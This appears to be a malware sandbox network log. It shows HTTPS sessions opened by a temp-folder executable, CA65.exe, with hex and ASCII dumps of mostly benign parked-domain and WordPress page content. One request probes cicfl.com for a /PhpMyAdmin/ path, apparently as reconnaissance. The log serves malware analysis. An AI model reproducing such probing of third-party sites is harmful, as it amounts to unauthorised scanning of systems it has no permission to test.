2023-12-22 20:15:09 UTC	295	IN	Data Raw: 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 64 65 2d 77 72 61 70 70 20 64 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 73 69 64 65 62 61 72 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 2d 6e 65 77 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 74 69 74 6c 65 20 67 72 65 65 6e 22 3e 59 75 65 6a 69 43 68 65 6d 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 6f 77 2d 73 61 76 65 20 73 73 2d 62 6e 20 22 3e 0a 3c 73 70 61 6e 3e 42 75 79 20 6e 6f 77 3a 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 Data Ascii: "><div class="side-wrapp dn-mobile"><div class="slide-sidebar-block"><div class="ss-block-inner"><div class="ss-block-inner-new"><span class="ss-block-title green">YuejiChem.com</span><span class="row-save ss-bn "><span>Buy now:</span><span class="
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 59 75 65 6a 69 43 68 65 6d 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 Data Ascii: 7ffa<a href="https://www.HugeDomains.com/shopping_cart.cfm?d=YuejiChem&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID').removeClass('hiddenAtLoad'
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 Data Ascii: ce-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></di
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 69 43 68 65 6d 2e 63 6f 6d 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 61 72 74 43 68 65 63 6b 22 20 76 61 6c 75 65 3d 22 30 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 43 68 65 63 6b 49 44 22 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 61 6e 64 65 72 46 75 6e 63 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 46 75 6e 63 28 29 Data Ascii: iChem.com" method="post" id="landerFormD36570BEC9E240418617A006B444A2D2ID"><input type="hidden" name="cartCheck" value="0" id="landerFormD36570BEC9E240418617A006B444A2D2CheckID"></form><script>function landerFuncD36570BEC9E240418617A006B444A2D2Func()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
272	192.168.2.4	53394	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	196	OUT	GET / HTTP/1.1 Host: www.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc4\|ZYXxK\|ZYXxK User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	2154	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6kHVQ== Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Request-Method: * Access-Control-Allow-Headers: * Access-Control-Max-Age: 86400 Link: </packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</packs/js/ads-4b8a83b0bbaf60e589e0.js>; rel=preload; as=script; nopush,</packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</assets/application-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</assets/style-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</assets/generic_lander-8c18c01aab6b1d2ebf833256e6dbdff67d20807e508d45e59875a48594655ea7.css>; rel=preload; as=style; nopush,<///ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"5a2a76a6715b8563a26cb64e88dbdea1" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: _digiadmin3_session=rCw2hXTTkjCGjrRCCP2rO8XtFuf%2BYAQhdFtD2WN%2FbFXCukNGkZ6VtQxvqG9Y6dv96TjaPyQMg15SttCe%2FtZdE1XbIJT%2Fn57HOJC6WA1dMz7Chyf8mUCEMvw%2BuSwlRkvLcsFKuNv8Wqzlw6kDwi5xb5poDdVXEtHATAgjPRVSWEKVk9uPOlIKihaxWJuzW%2BBiGtv0%2FtIYkQSpVgIWOwAO2eVnYMLBo%2FWRW5Gj4AdwBsWfxYIMQsY8FIBg2lEjCHMynYsq%2F8sHbyMgaEQKKaOudsORS5d1C32C6Jth--Zwwvdiypz3w3l9Uf--A3UnSGI7qAzwQp2qDWTdJg%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: 74f86c32-2a59-4510-b8b5-c2547932b158 X-Runtime: 0.105049
2023-12-22 20:15:09 UTC	11415	IN	Data Raw: 38 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 27 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 2f 33 2f 53 72 56 37 50 38 41 73 54 48 4d 46 53 70 50 6d 59 62 79 76 32 50 6b 41 43 48 77 6d 47 39 5a 2b 31 49 46 5a 71 33 76 41 35 34 49 4e 37 70 51 63 47 6e 68 67 4e 6f 2b 38 53 4e 39 72 2f 4b 74 55 57 43 62 39 4f 50 71 54 66 57 4d 31 4e 34 77 2f 45 55 43 41 77 45 41 41 51 3d 3d 5f 4b 4d 58 58 31 77 68 45 2b 4c 71 57 6c 6e 42 4f 49 42 30 78 4a 4c 77 70 7a 58 54 56 49 56 58 77 74 50 78 42 71 6f 37 54 74 77 63 67 63 54 62 43 52 58 36 6c 67 6e 47 42 46 63 4b 53 70 64 51 51 55 37 39 39 6b 5a 30 6d 4a 4a 55 38 54 33 68 52 45 36 Data Ascii: 809<!DOCTYPE html><html data-adblockkey='MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
273	192.168.2.4	53530	209.124.80.122	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	170	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:09 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:09 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
2023-12-22 20:15:10 UTC	7915	IN	Data Raw: 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 6f 75 74 6c 69 6e 65 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 61 35 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 66 69 6c 6c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d Data Ascii: 370;}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #fa5370;color:#fa5370;}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#fa5370;color:#ffffff;}.ast-header-break-
2023-12-22 20:15:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:10 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 32 38 35 37 31 34 32 38 35 37 31 72 65 6d 3b 7d 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 38 35 37 31 34 32 38 35 37 31 34 32 39 72 65 6d 3b 7d 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 32 38 35 37 31 34 32 38 35 37 31 34 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: 1f40omment-reply-title{font-size:23px;font-size:1.6428571428571rem;}.ast-comment-meta{font-size:11px;font-size:0.78571428571429rem;}.widget-title{font-size:20px;font-size:1.4285714285714rem;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2023-12-22 20:15:10 UTC	7822	IN	Data Raw: 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d Data Ascii: y{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--
2023-12-22 20:15:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:10 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 Data Ascii: 1f40nt-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}</style><link rel='styles
2023-12-22 20:15:10 UTC	7822	IN	Data Raw: 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 34 39 30 31 39 36 30 37 38 34 33 31 34 20 30 2e 39 38 38 32 33 35 32 39 34 31 31 37 36 35 22 20 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 20 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 Data Ascii: .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues
2023-12-22 20:15:10 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:10 UTC	1382	IN	Data Raw: 35 35 66 0d 0a 2d 63 6f 6c 2d 78 73 2d 31 32 22 20 3e 0d 0a 09 09 09 09 09 09 09 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 20 7c 20 50 6f 77 65 72 65 64 20 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: 55f-col-xs-12" >Copyright 2023 <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span> \| Powered by <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span></div></div> <!-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
274	192.168.2.4	53827	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	199	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	798	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BIwU8gnd4IVl%2Bu9hGLCz4NXAjFRMpTx1GNWhy6bomPjvdyELEDUTnpRBtMxd1KHQOP6ntOGh%2Fa7Vzxh15Ia%2B8NPncVLEcRllRRbtmseHqsYZHRq17A5OKOrBn%2FWhbZ3XHgVdG9s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0902fb77b3d7-MIA
2023-12-22 20:15:09 UTC	571	IN	Data Raw: 37 63 38 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7c84<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 Data Ascii: /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/c
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 Data Ascii: k rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag(
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 48 65 61 64 65 72 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 Data Ascii: Header Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form 